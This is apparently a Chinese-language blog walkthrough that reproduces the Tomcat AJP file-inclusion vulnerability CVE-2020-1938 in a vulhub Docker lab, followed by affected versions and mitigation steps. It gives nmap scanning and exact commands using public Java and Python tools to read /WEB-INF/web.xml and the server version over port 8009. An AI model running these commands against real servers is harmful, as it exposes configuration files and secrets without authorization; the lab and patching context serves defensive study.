1. 程式人生 > 實用技巧 >Tomcat AJP 檔案包含漏洞復現(CVE-2020-1938)

Tomcat AJP 檔案包含漏洞復現(CVE-2020-1938)

漏洞原理

Tomcat 伺服器是一個免費的開放原始碼的Web 應用伺服器,其安裝後會預設開啟ajp聯結器,方便與其他web伺服器通過ajp協議進行互動。

環境搭建

靶機 kali2020 ,使用docker容器,進入vulhub-master/tomcat/CVE-2020-1938目錄下一鍵啟動

sudo docker-compose up -d

web訪問啟動地址,成功獲取web頁面,服務啟動成功

漏洞復現

使用nmap掃描埠

nmap 192.168.177.137

成功讀取web.xml檔案內容

工具地址:

https://github.com/0nise/CVE-2020-1938

java -jar 1
.jar 192.168.177.137 8009 file /WEB-INF/web.xml //使用java工具讀取

或者使用python指令碼檢測:

https://github.com/hypn0s/AJPy

讀取Tomcat版本

python2 tomcat.py version 192.168.177.137

讀取web.xml檔案內容

python2 tomcat.py read_file --webapp=manager /WEB-INF/web.xml 192.168.177.137

漏洞復現是流量顯示,伺服器返回資訊:

漏洞修復

影響版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100

Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

修復建議

1、禁用AIP協議埠,在conf/server.xml配置檔案中註釋掉<Connector port="8009"protocol="AJP/1.3"redirectPort="8443"/>;

2、升級最新版本;
3、Tomcat 7和Tomcat 9可為AJP Connector配置secret來設定AJP協議的認證憑證;
4、Tomcat 8的可為AJP Connector配置requiredSecret來設定AJP協議的認證憑證。

參考連結

http://www.bubuko.com/infodetail-3432049.html

https://www.cnblogs.com/renhaoblog/p/13033734.html

https://www.jianshu.com/p/f3e4b5896edb

https://xz.aliyun.com/t/7325

https://www.freebuf.com/vuls/228108.html

免責宣告

嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 後果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合 !